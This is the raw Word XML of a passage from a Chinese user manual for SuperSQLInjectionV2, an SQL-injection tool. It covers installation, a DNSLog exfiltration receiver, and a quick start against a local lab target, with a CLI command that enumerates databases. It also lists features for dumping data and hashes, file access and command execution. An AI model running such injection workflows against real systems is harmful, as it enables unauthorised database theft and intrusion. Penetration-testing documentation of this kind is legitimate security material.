          <w:p w14:paraId="5CA479BE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令行（Native AOT 单文件）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4784"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="43E696F8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>脚本化批量检测与取数，无界面、易集成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2569"/>
          </w:tcPr>
          <w:p w14:paraId="43E8CD64">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SuperSQLInjectionV2.DnsServer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2391"/>
          </w:tcPr>
          <w:p w14:paraId="6E209730">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>独立控制台服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4784"/>
          </w:tcPr>
          <w:p w14:paraId="61FBF2DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>部署到公网 VPS 的自建 DNSLog 接收端，配合 DNS 外带注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DB9DEA4">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB2F4A8">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GUI 与 CLI 共用同一套核心引擎与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 配置目录（取数模板、检测用例、字典、报错指纹），检测结论与取数行为完全一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460CA3EC">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="1F3B63"/>
        </w:pBdr>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t>从 V1 升级的用户请阅读《SuperSQLInjectionV2 V2 更新说明.md》，了解 V2 相对 V1 的新增与优化项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA748A4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 2 章 安装与运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7276558E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.1 图形界面（Desktop）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D267F28">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：运行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SuperSQLInjectionV2.Desktop.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31563E">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>macOS / Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：从源码发布或运行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dev/publish-release.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 产物；开发调试可在仓库根目录执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A949C">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dotnet run --project SuperSQLInjectionV2.Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BFA6C6">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738BF6C6">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">首次运行后，程序会在运行目录下使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 配置目录（取数模板、检测用例、字典等），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>请勿删除该目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053D232C">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>界面支持明暗双主题，在标题栏右侧切换；窗口大小、主题等偏好自动记忆。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A296522">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.2 命令行（SuperSQLInjectionV2.Cmd）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50A1DC">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SuperSQLInjectionV2.Cmd 为 Native AOT 单文件，无需安装 .NET 运行时。仓库 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dev/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目录提供三平台发布脚本：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1291"/>
        <w:gridCol w:w="3522"/>
        <w:gridCol w:w="4932"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1291"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="322E8BE4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3522"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="1656D6C2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>发布脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4931"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="19D5D576">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>产物</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1291"/>
          </w:tcPr>
          <w:p w14:paraId="4E7A3166">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Windows x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3522"/>
          </w:tcPr>
          <w:p w14:paraId="41D4DAA2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dev/publish-cli-aot.cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4931"/>
          </w:tcPr>
          <w:p w14:paraId="7AD12F3C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SuperSQLInjectionV2.Cmd.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1291"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5FA78184">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Linux x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3522"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="702B2FCC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dev/publish-cli-aot-linux.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4931"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0BAB795E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SuperSQLInjectionV2.Cmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">（需 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>chmod +x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1291"/>
          </w:tcPr>
          <w:p w14:paraId="3ED8A536">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>macOS arm64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3522"/>
          </w:tcPr>
          <w:p w14:paraId="10478AE8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dev/publish-cli-aot-osx.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4931"/>
          </w:tcPr>
          <w:p w14:paraId="0EECBE5E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SuperSQLInjectionV2.Cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55FA7512">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F26BC54">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>运行要求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A5F9A">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制同目录必须保留 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目录（取数模板 / 检测用例 / 字典），目录结构不可破坏；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4A60D6">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>以二进制所在目录为工作目录执行；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C78EE4C">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">默认输出写入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>output/&lt;host&gt;_&lt;port&gt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">（可用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--output-dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 修改）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D52E16">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>验证安装：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3934C50E">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SuperSQLInjectionV2.Cmd --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78BBC0">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SuperSQLInjectionV2.Cmd --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B36A8">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE6F132">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.3 DNSLog 接收服务（DnsServer）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC29064">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>需部署到具有公网 IP 的 VPS，详见 第 11 章。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A7AB8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 3 章 快速上手（五分钟跑通一次注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B06CE">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">以本地靶场 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8090/JVApp/mysql.jsp?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（MySQL 注入点）为例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAEFE12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>3.1 GUI 流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E59B894">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>打开「注入检测」页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，在请求编辑区填入目标 URL（或粘贴完整 HTTP 报文）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFEF016">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">在参数 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>插入注入标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（选中后点"注入标记"按钮），或直接让工具自动识别参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B29C76">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>开始检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>。检测日志实时滚动，检测概览面板同步显示进度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C108C">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>检测命中后，状态栏显示"存在注入"，并自动标注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>注入点位置、注入类型、数据库类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>；该条结果进入「注入记录」页。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B8DB9A">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>切换到「注入记录」页，选中该记录 → 点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>取数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（或"恢复到当前配置"），自动跳转到「数据管理」页并带出该注入点的全部通道配置（含时间盲注的时间值）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F727EC">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>在「数据管理」页按需操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2EF602">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>环境变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：一键读取版本、当前用户、当前库、主机名、是否 DBA 等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333820E0">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>数据操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：获取库 → 获取表 → 获取列 → 获取数据（树形浏览，双击节点逐级展开）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66067396">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">需要时切到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Hash 读取 / 权限角色 / 文件操作 / 命令执行 / 自定义 SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 选项卡执行对应动作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B38D6CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>3.2 CLI 流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E8071E">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 一步完成检测 + 枚举所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91163E">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SuperSQLInjectionV2.Cmd -u "http://127.0.0.1:8090/JVApp/mysql.jsp?id=1" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C64691A">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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F821572">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 指定库表拖数据</w:t>
      </w:r>
    </w:p>
